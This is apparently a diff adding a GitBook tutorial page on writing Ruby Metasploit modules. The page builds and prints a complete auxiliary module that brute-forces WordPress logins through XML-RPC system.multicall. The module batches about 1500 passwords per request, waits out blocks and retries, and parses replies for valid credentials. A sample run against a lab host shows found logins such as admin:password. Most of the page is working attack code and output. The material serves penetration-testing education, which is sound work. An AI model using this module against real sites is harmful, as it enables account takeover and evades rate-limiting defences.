+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html&apos;</span>]
1414
+ ]
1415
+ ))
1416
+
1417
+ register_options(
1418
+ [
1419
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;TARGETURI&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;The base path&apos;</span>, <span class="hljs-string">&apos;/&apos;</span>]),
1420
+ <span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">&apos;WPUSER_FILE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;File containing usernames, one per line&apos;</span>,
1421
+ <span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">&quot;wordlists&quot;</span>, <span class="hljs-string">&quot;http_default_users.txt&quot;</span>) ]),
1422
+ <span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">&apos;WPPASS_FILE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;File containing passwords, one per line&apos;</span>,
1423
+ <span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">&quot;wordlists&quot;</span>, <span class="hljs-string">&quot;http_default_pass.txt&quot;</span>)]),
1424
+ <span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Time(minutes) to wait if got blocked&apos;</span>, <span class="hljs-number">6</span>]),
1425
+ <span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">&apos;CHUNKSIZE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Number of passwords need to be sent per request. (1700 is the max)&apos;</span>, <span class="hljs-number">1500</span>])
1426
+ ], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
1427
+ <span class="hljs-keyword">end</span>
1428
+ <span class="hljs-keyword">end</span>
1429
+ </code></pre>
1430
+ <ul>
1431
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Read username and password lists as arrays </li>
1432
+ </ul>
1433
+ <pre><code class="lang-ruby"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">usernames</span></span>
1434
+ <span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">&apos;WPUSER_FILE&apos;</span>]).map {|user| user.chomp}
1435
+ <span class="hljs-keyword">end</span>
1436
+
1437
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">passwords</span></span>
1438
+ <span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">&apos;WPPASS_FILE&apos;</span>]).map {|pass| pass.chomp}
1439
+ <span class="hljs-keyword">end</span>
1440
+ </code></pre>
1441
+ <ul>
1442
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Build/Generate XML file takes a user and iterate around the passwords</li>
1443
+ </ul>
1444
+ <pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
1445
+ <span class="hljs-comment"># XML Factory</span>
1446
+ <span class="hljs-comment">#</span>
1447
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">generate_xml</span><span class="hljs-params">(user)</span></span>
1448
+
1449
+ vprint_warning(<span class="hljs-string">&apos;Generating XMLs may take a while depends on the list file(s) size.&apos;</span>) <span class="hljs-keyword">if</span> passwords.size &gt; <span class="hljs-number">1500</span>
1450
+ xml_payloads = [] <span class="hljs-comment"># Container for all generated XMLs</span>
1451
+ <span class="hljs-comment"># Evil XML | Limit number of log-ins to CHUNKSIZE/request due WordPress limitation which is 1700 maximum.</span>
1452
+ passwords.each_slice(datastore[<span class="hljs-string">&apos;CHUNKSIZE&apos;</span>]) <span class="hljs-keyword">do</span> |pass_group|
1453
+
1454
+ document = <span class="hljs-constant">Nokogiri::XML::Builder</span>.new <span class="hljs-keyword">do</span> |xml|
1455
+ xml.methodCall {
1456
+ xml.methodName(<span class="hljs-string">&quot;system.multicall&quot;</span>)
1457
+ xml.params {
1458
+ xml.param {
1459
+ xml.value {
1460
+ xml.array {
1461
+ xml.data {
1462
+
1463
+ pass_group.each <span class="hljs-keyword">do</span> |pass|
1464
+ xml.value {
1465
+ xml.struct {
1466
+ xml.member {
1467
+ xml.name(<span class="hljs-string">&quot;methodName&quot;</span>)
1468
+ xml.value { xml.string(<span class="hljs-string">&quot;wp.getUsersBlogs&quot;</span>) }}
1469
+ xml.member {
1470
+ xml.name(<span class="hljs-string">&quot;params&quot;</span>)
1471
+ xml.value {
1472
+ xml.array {
1473
+ xml.data {
1474
+ xml.value {
1475
+ xml.array {
1476
+ xml.data {
1477
+ xml.value { xml.string(user) }
1478
+ xml.value { xml.string(pass) }
1479
+ }}}}}}}}}
1480
+ <span class="hljs-keyword">end</span>
1481
+
1482
+ }}}}}}
1483
+ <span class="hljs-keyword">end</span>
1484
+
1485
+ xml_payloads &lt;&lt; document.to_xml
1486
+ <span class="hljs-keyword">end</span>
1487
+
1488
+ vprint_status(<span class="hljs-string">&apos;Generating XMLs just done.&apos;</span>)
1489
+ xml_payloads
1490
+ <span class="hljs-keyword">end</span>
1491
+ </code></pre>
1492
+ <ul>
1493
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if target is running WordPress </li>
1494
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if target enabling RPC</li>
1495
+ </ul>
1496
+ <pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
1497
+ <span class="hljs-comment"># Check target status</span>
1498
+ <span class="hljs-comment">#</span>
1499
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check_wpstatus</span></span>
1500
+ print_status(<span class="hljs-string">&quot;Checking <span class="hljs-subst">#{peer}</span> status!&quot;</span>)
1501
+
1502
+ <span class="hljs-keyword">if</span> !wordpress_and_online?
1503
+ print_error(<span class="hljs-string">&quot;<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{target_uri}</span> does not appear to be running WordPress or you got blocked! (Do Manual Check)&quot;</span>)
1504
+ <span class="hljs-keyword">nil</span>
1505
+ <span class="hljs-keyword">elsif</span> !wordpress_xmlrpc_enabled?
1506
+ print_error(<span class="hljs-string">&quot;<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{wordpress_url_xmlrpc}</span> does not enable XML-RPC&quot;</span>)
1507
+ <span class="hljs-keyword">nil</span>
1508
+ <span class="hljs-keyword">else</span>
1509
+ print_status(<span class="hljs-string">&quot;Target <span class="hljs-subst">#{peer}</span> is running WordPress&quot;</span>)
1510
+ <span class="hljs-keyword">true</span>
1511
+ <span class="hljs-keyword">end</span>
1512
+
1513
+ <span class="hljs-keyword">end</span>
1514
+ </code></pre>
1515
+ <ul>
1516
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Setup the HTTP with XML POST request</li>
1517
+ </ul>
1518
+ <pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
1519
+ <span class="hljs-comment"># Connection Setup</span>
1520
+ <span class="hljs-comment">#</span>
1521
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send</span><span class="hljs-params">(xml)</span></span>
1522
+ uri = target_uri.path
1523
+ opts =
1524
+ {
1525
+ <span class="hljs-string">&apos;method&apos;</span> =&gt; <span class="hljs-string">&apos;POST&apos;</span>,
1526
+ <span class="hljs-string">&apos;uri&apos;</span> =&gt; normalize_uri(uri, wordpress_url_xmlrpc),
1527
+ <span class="hljs-string">&apos;data&apos;</span> =&gt; xml,
1528
+ <span class="hljs-string">&apos;ctype&apos;</span> =&gt;<span class="hljs-string">&apos;text/xml&apos;</span>
1529
+ }
1530
+ client = <span class="hljs-constant">Rex::Proto::Http::Client</span>.new(rhost)
1531
+ client.connect
1532
+ req = client.request_cgi(opts)
1533
+ res = client.send_recv(req)
1534
+
1535
+ <span class="hljs-keyword">if</span> res &amp;&amp; res.code != <span class="hljs-number">200</span>
1536
+ print_error(<span class="hljs-string">&apos;It seems you got blocked!&apos;</span>)
1537
+ print_warning(<span class="hljs-string">&quot;I&apos;ll sleep for <span class="hljs-subst">#{datastore[<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>]}</span> minutes, then I&apos;ll try again. CTR+C to exit&quot;</span>)
1538
+ sleep datastore[<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>] * <span class="hljs-number">60</span>
1539
+ <span class="hljs-keyword">end</span>
1540
+ <span class="hljs-variable">@res</span> = res
1541
+ <span class="hljs-keyword">end</span>
1542
+ </code></pre>
1543
+ <ul>
1544
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Parse XML request and response </li>
1545
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Find the exact correct credentials </li>
1546
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if we got blocked</li>
1547
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Parsing the result and find which password is correct </li>
1548
+ </ul>
1549
+ <pre><code class="lang-ruby"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span></span>
1550
+ <span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> check_wpstatus.<span class="hljs-keyword">nil</span>?
1551
+
1552
+ usernames.each <span class="hljs-keyword">do</span> |user|
1553
+ passfound = <span class="hljs-keyword">false</span>
1554
+
1555
+ print_status(<span class="hljs-string">&quot;Brute forcing user: <span class="hljs-subst">#{user}</span>&quot;</span>)
1556
+ generate_xml(user).each <span class="hljs-keyword">do</span> |xml|
1557
+ <span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> passfound == <span class="hljs-keyword">true</span>
1558
+
1559
+ send(xml)
1560
+
1561
+ <span class="hljs-comment"># Request Parser</span>
1562
+ req_xml = <span class="hljs-constant">Nokogiri::Slop</span> xml
1563
+ <span class="hljs-comment"># Response Parser</span>
1564
+ res_xml = <span class="hljs-constant">Nokogiri::Slop</span> <span class="hljs-variable">@res</span>.to_s.scan(<span class="hljs-regexp">/&lt;.*&gt;/</span>).join
1565
+ puts res_xml
1566
+ res_xml.search(<span class="hljs-string">&quot;methodResponse/params/param/value/array/data/value&quot;</span>).each_with_index <span class="hljs-keyword">do</span> |value, i|
1567
+
1568
+ result = value.at(<span class="hljs-string">&quot;struct/member/value/int&quot;</span>)
1569
+ <span class="hljs-comment"># If response error code doesn&apos;t not exist, then it&apos;s the correct credentials!</span>
1570
+ <span class="hljs-keyword">if</span> result.<span class="hljs-keyword">nil</span>?
1571
+ user = req_xml.search(<span class="hljs-string">&quot;data/value/array/data&quot;</span>)[i].value[<span class="hljs-number">0</span>].text.strip
1572
+ pass = req_xml.search(<span class="hljs-string">&quot;data/value/array/data&quot;</span>)[i].value[<span class="hljs-number">1</span>].text.strip
1573
+ print_good(<span class="hljs-string">&quot;Credentials Found! <span class="hljs-subst">#{user}</span>:<span class="hljs-subst">#{pass}</span>&quot;</span>)
1574
+
1575
+ passfound = <span class="hljs-keyword">true</span>
1576
+ <span class="hljs-keyword">end</span>
1577
+
1578
+ <span class="hljs-keyword">end</span>
1579
+
1580
+ <span class="hljs-keyword">unless</span> user == usernames.last
1581
+ vprint_status(<span class="hljs-string">&apos;Sleeping for 2 seconds..&apos;</span>)
1582
+ sleep <span class="hljs-number">2</span>
1583
+ <span class="hljs-keyword">end</span>
1584
+
1585
+ <span class="hljs-keyword">end</span>
1586
+ <span class="hljs-keyword">end</span>
1587
+ <span class="hljs-keyword">end</span>
1588
+ </code></pre>
1589
+ <h4 id="wrapping-up"><a name="wrapping-up" class="plugin-anchor" href="#wrapping-up"><span class="fa fa-link"></span></a>Wrapping up</h4>
1590
+ <pre><code class="lang-ruby"><span class="hljs-comment">##</span>
1591
+ <span class="hljs-comment"># This module requires Metasploit: http://www.metasploit.com/download</span>
1592
+ <span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
1593
+ <span class="hljs-comment">##</span>
1594
+
1595
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;msf/core&apos;</span>
1596
+
1597
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">&lt; <span class="hljs-parent">Msf::Auxiliary</span></span></span>
1598
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HttpClient</span>
1599
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HTTP::Wordpress</span>
1600
+
1601
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
1602
+ <span class="hljs-keyword">super</span>(update_info(
1603
+ info,
1604
+ <span class="hljs-string">&apos;Name&apos;</span> =&gt; <span class="hljs-string">&apos;WordPress XML-RPC Massive Brute Force&apos;</span>,
1605
+ <span class="hljs-string">&apos;Description&apos;</span> =&gt; <span class="hljs-string">%q{WordPress massive brute force attacks via WordPress XML-RPC service.}</span>,
1606
+ <span class="hljs-string">&apos;License&apos;</span> =&gt; <span class="hljs-constant">MSF_LICENSE</span>,
1607
+ <span class="hljs-string">&apos;Author&apos;</span> =&gt;
1608
+ [
1609
+ <span class="hljs-string">&apos;Sabri (@KINGSABRI)&apos;</span>, <span class="hljs-comment"># Module Writer</span>
1610
+ <span class="hljs-string">&apos;William (WCoppola@Lares.com)&apos;</span> <span class="hljs-comment"># Module Requester</span>
1611
+ ],
1612
+ <span class="hljs-string">&apos;References&apos;</span> =&gt;
1613
+ [
1614
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/&apos;</span>],
1615
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html&apos;</span>]
1616
+ ]
1617
+ ))
1618
+
1619
+ register_options(
1620
+ [
1621
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;TARGETURI&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;The base path&apos;</span>, <span class="hljs-string">&apos;/&apos;</span>]),
1622
+ <span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">&apos;WPUSER_FILE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;File containing usernames, one per line&apos;</span>,
1623
+ <span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">&quot;wordlists&quot;</span>, <span class="hljs-string">&quot;http_default_users.txt&quot;</span>) ]),
1624
+ <span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">&apos;WPPASS_FILE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;File containing passwords, one per line&apos;</span>,
1625
+ <span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">&quot;wordlists&quot;</span>, <span class="hljs-string">&quot;http_default_pass.txt&quot;</span>)]),
1626
+ <span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Time(minutes) to wait if got blocked&apos;</span>, <span class="hljs-number">6</span>]),
1627
+ <span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">&apos;CHUNKSIZE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Number of passwords need to be sent per request. (1700 is the max)&apos;</span>, <span class="hljs-number">1500</span>])
1628
+ ], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
1629
+ <span class="hljs-keyword">end</span>
1630
+
1631
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">usernames</span></span>
1632
+ <span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">&apos;WPUSER_FILE&apos;</span>]).map {|user| user.chomp}
1633
+ <span class="hljs-keyword">end</span>
1634
+
1635
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">passwords</span></span>
1636
+ <span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">&apos;WPPASS_FILE&apos;</span>]).map {|pass| pass.chomp}
1637
+ <span class="hljs-keyword">end</span>
1638
+
1639
+ <span class="hljs-comment">#</span>
1640
+ <span class="hljs-comment"># XML Factory</span>
1641
+ <span class="hljs-comment">#</span>
1642
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">generate_xml</span><span class="hljs-params">(user)</span></span>
1643
+
1644
+ vprint_warning(<span class="hljs-string">&apos;Generating XMLs may take a while depends on the list file(s) size.&apos;</span>) <span class="hljs-keyword">if</span> passwords.size &gt; <span class="hljs-number">1500</span>
1645
+ xml_payloads = [] <span class="hljs-comment"># Container for all generated XMLs</span>
1646
+ <span class="hljs-comment"># Evil XML | Limit number of log-ins to CHUNKSIZE/request due WordPress limitation which is 1700 maximum.</span>
1647
+ passwords.each_slice(datastore[<span class="hljs-string">&apos;CHUNKSIZE&apos;</span>]) <span class="hljs-keyword">do</span> |pass_group|
1648
+
1649
+ document = <span class="hljs-constant">Nokogiri::XML::Builder</span>.new <span class="hljs-keyword">do</span> |xml|
1650
+ xml.methodCall {
1651
+ xml.methodName(<span class="hljs-string">&quot;system.multicall&quot;</span>)
1652
+ xml.params {
1653
+ xml.param {
1654
+ xml.value {
1655
+ xml.array {
1656
+ xml.data {
1657
+
1658
+ pass_group.each <span class="hljs-keyword">do</span> |pass|
1659
+ xml.value {
1660
+ xml.struct {
1661
+ xml.member {
1662
+ xml.name(<span class="hljs-string">&quot;methodName&quot;</span>)
1663
+ xml.value { xml.string(<span class="hljs-string">&quot;wp.getUsersBlogs&quot;</span>) }}
1664
+ xml.member {
1665
+ xml.name(<span class="hljs-string">&quot;params&quot;</span>)
1666
+ xml.value {
1667
+ xml.array {
1668
+ xml.data {
1669
+ xml.value {
1670
+ xml.array {
1671
+ xml.data {
1672
+ xml.value { xml.string(user) }
1673
+ xml.value { xml.string(pass) }
1674
+ }}}}}}}}}
1675
+ <span class="hljs-keyword">end</span>
1676
+
1677
+ }}}}}}
1678
+ <span class="hljs-keyword">end</span>
1679
+
1680
+ xml_payloads &lt;&lt; document.to_xml
1681
+ <span class="hljs-keyword">end</span>
1682
+
1683
+ vprint_status(<span class="hljs-string">&apos;Generating XMLs just done.&apos;</span>)
1684
+ xml_payloads
1685
+ <span class="hljs-keyword">end</span>
1686
+
1687
+ <span class="hljs-comment">#</span>
1688
+ <span class="hljs-comment"># Check target status</span>
1689
+ <span class="hljs-comment">#</span>
1690
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check_wpstatus</span></span>
1691
+ print_status(<span class="hljs-string">&quot;Checking <span class="hljs-subst">#{peer}</span> status!&quot;</span>)
1692
+
1693
+ <span class="hljs-keyword">if</span> !wordpress_and_online?
1694
+ print_error(<span class="hljs-string">&quot;<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{target_uri}</span> does not appear to be running WordPress or you got blocked! (Do Manual Check)&quot;</span>)
1695
+ <span class="hljs-keyword">nil</span>
1696
+ <span class="hljs-keyword">elsif</span> !wordpress_xmlrpc_enabled?
1697
+ print_error(<span class="hljs-string">&quot;<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{wordpress_url_xmlrpc}</span> does not enable XML-RPC&quot;</span>)
1698
+ <span class="hljs-keyword">nil</span>
1699
+ <span class="hljs-keyword">else</span>
1700
+ print_status(<span class="hljs-string">&quot;Target <span class="hljs-subst">#{peer}</span> is running WordPress&quot;</span>)
1701
+ <span class="hljs-keyword">true</span>
1702
+ <span class="hljs-keyword">end</span>
1703
+
1704
+ <span class="hljs-keyword">end</span>
1705
+
1706
+ <span class="hljs-comment">#</span>
1707
+ <span class="hljs-comment"># Connection Setup</span>
1708
+ <span class="hljs-comment">#</span>
1709
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send</span><span class="hljs-params">(xml)</span></span>
1710
+ uri = target_uri.path
1711
+ opts =
1712
+ {
1713
+ <span class="hljs-string">&apos;method&apos;</span> =&gt; <span class="hljs-string">&apos;POST&apos;</span>,
1714
+ <span class="hljs-string">&apos;uri&apos;</span> =&gt; normalize_uri(uri, wordpress_url_xmlrpc),
1715
+ <span class="hljs-string">&apos;data&apos;</span> =&gt; xml,
1716
+ <span class="hljs-string">&apos;ctype&apos;</span> =&gt;<span class="hljs-string">&apos;text/xml&apos;</span>
1717
+ }
1718
+ client = <span class="hljs-constant">Rex::Proto::Http::Client</span>.new(rhost)
1719
+ client.connect
1720
+ req = client.request_cgi(opts)
1721
+ res = client.send_recv(req)
1722
+
1723
+ <span class="hljs-keyword">if</span> res &amp;&amp; res.code != <span class="hljs-number">200</span>
1724
+ print_error(<span class="hljs-string">&apos;It seems you got blocked!&apos;</span>)
1725
+ print_warning(<span class="hljs-string">&quot;I&apos;ll sleep for <span class="hljs-subst">#{datastore[<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>]}</span> minutes, then I&apos;ll try again. CTR+C to exit&quot;</span>)
1726
+ sleep datastore[<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>] * <span class="hljs-number">60</span>
1727
+ <span class="hljs-keyword">end</span>
1728
+ <span class="hljs-variable">@res</span> = res
1729
+ <span class="hljs-keyword">end</span>
1730
+
1731
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span></span>
1732
+ <span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> check_wpstatus.<span class="hljs-keyword">nil</span>?
1733
+
1734
+ usernames.each <span class="hljs-keyword">do</span> |user|
1735
+ passfound = <span class="hljs-keyword">false</span>
1736
+
1737
+ print_status(<span class="hljs-string">&quot;Brute forcing user: <span class="hljs-subst">#{user}</span>&quot;</span>)
1738
+ generate_xml(user).each <span class="hljs-keyword">do</span> |xml|
1739
+ <span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> passfound == <span class="hljs-keyword">true</span>
1740
+
1741
+ send(xml)
1742
+
1743
+ <span class="hljs-comment"># Request Parser</span>
1744
+ req_xml = <span class="hljs-constant">Nokogiri::Slop</span> xml
1745
+ <span class="hljs-comment"># Response Parser</span>
1746
+ res_xml = <span class="hljs-constant">Nokogiri::Slop</span> <span class="hljs-variable">@res</span>.to_s.scan(<span class="hljs-regexp">/&lt;.*&gt;/</span>).join
1747
+ puts res_xml
1748
+ res_xml.search(<span class="hljs-string">&quot;methodResponse/params/param/value/array/data/value&quot;</span>).each_with_index <span class="hljs-keyword">do</span> |value, i|
1749
+
1750
+ result = value.at(<span class="hljs-string">&quot;struct/member/value/int&quot;</span>)
1751
+ <span class="hljs-comment"># If response error code doesn&apos;t not exist</span>
1752
+ <span class="hljs-keyword">if</span> result.<span class="hljs-keyword">nil</span>?
1753
+ user = req_xml.search(<span class="hljs-string">&quot;data/value/array/data&quot;</span>)[i].value[<span class="hljs-number">0</span>].text.strip
1754
+ pass = req_xml.search(<span class="hljs-string">&quot;data/value/array/data&quot;</span>)[i].value[<span class="hljs-number">1</span>].text.strip
1755
+ print_good(<span class="hljs-string">&quot;Credentials Found! <span class="hljs-subst">#{user}</span>:<span class="hljs-subst">#{pass}</span>&quot;</span>)
1756
+
1757
+ passfound = <span class="hljs-keyword">true</span>
1758
+ <span class="hljs-keyword">end</span>
1759
+
1760
+ <span class="hljs-keyword">end</span>
1761
+
1762
+ <span class="hljs-keyword">unless</span> user == usernames.last
1763
+ vprint_status(<span class="hljs-string">&apos;Sleeping for 2 seconds..&apos;</span>)
1764
+ sleep <span class="hljs-number">2</span>
1765
+ <span class="hljs-keyword">end</span>
1766
+
1767
+ <span class="hljs-keyword">end</span> <span class="hljs-keyword">end</span> <span class="hljs-keyword">end</span>
1768
+ <span class="hljs-keyword">end</span>
1769
+ </code></pre>
1770
+ <ul>
1771
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if the module has been written correctly (msftidy.rb)</li>
1772
+ </ul>
1773
+ <pre><code>metasploit-framework/tools/dev/msftidy.rb wordpress_xmlrpc_massive_bruteforce.rb
1774
+ </code></pre><p><strong>Run it</strong></p>
1775
+ <pre><code>msf auxiliary(wordpress_xmlrpc_massive_bruteforce) &gt; show options
1776
+
1777
+ Module options (auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce):
1778
+
1779
+ Name Current Setting Required Description
1780
+ ---- --------------- -------- -----------
1781
+ BLOCKEDWAIT 6 yes Time(minutes) to wait if got blocked
1782
+ CHUNKSIZE 1500 yes Number of passwords need to be sent per request. (1700 is the max)
1783
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
1784
+ RHOST 172.17.0.3 yes The target address
1785
+ RPORT 80 yes The target port
1786
+ TARGETURI / yes The base path
1787
+ VHOST no HTTP server virtual host
1788
+ WPPASS_FILE /home/KING/Code/MSF/metasploit-framework/data/wordlists/http_default_pass.txt yes File containing passwords, one per line
1789
+ WPUSER_FILE /home/KING/Code/MSF/metasploit-framework/data/wordlists/http_default_users.txt yes File containing usernames, one per line
1790
+
1791
+ msf auxiliary(wordpress_xmlrpc_massive_bruteforce) &gt; run
1792
+
1793
+ [*] Checking 172.17.0.3:80 status!
1794
+ [*] Target 172.17.0.3:80 is running WordPress
1795
+ [*] Brute forcing user: admin
1796
+ [+] Credentials Found! admin:password
1797
+ [*] Brute forcing user: manager
1798
+ [*] Brute forcing user: root
1799
+ [*] Brute forcing user: cisco
1800
+ [*] Brute forcing user: apc
1801
+ [*] Brute forcing user: pass
1802
+ [*] Brute forcing user: security
1803
+ [*] Brute forcing user: user
1804
+ [*] Brute forcing user: system
1805
+ [+] Credentials Found! system:root
1806
+ [*] Brute forcing user: sys
1807
+ [*] Brute forcing user: wampp
1808
+ [*] Brute forcing user: newuser
1809
+ [*] Brute forcing user: xampp-dav-unsecure
1810
+ [*] Auxiliary module execution completed
1811
+ </code></pre>
1812
+
1813
+ </section>
1814
+
1815
+
1816
+ </div>
1817
+ </div>
1818
+ </div>
1819
+
1820
+
1821
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html" class="navigation navigation-prev " aria-label="Previous page: Metasploit"><i class="fa fa-angle-left"></i></a>
1822
+
1823
+
1824
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html" class="navigation navigation-next " aria-label="Next page: Exploit module"><i class="fa fa-angle-right"></i></a>
1825
+
1826
+ </div>
1827
+ </div>
1828
+
1829
+
1830
+ <script src="../gitbook/app.js"></script>
1831
+
1832
+
1833
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1834
+
1835
+
1836
+
1837
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1838
+
1839
+
1840
+
1841
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1842
+
1843
+
1844
+
1845
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1846
+
1847
+
1848
+
1849
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1850
+
1851
+
1852
+
1853
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1854
+
1855
+
1856
+
1857
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1858
+
1859
+
1860
+ <script>
1861
+ require(["gitbook"], function(gitbook) {
1862
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1863
+ gitbook.start(config);
1864
+ });
1865
+ </script>
1866
+
1867
+
1868
+ </body>
1869
+
1870
+ </html>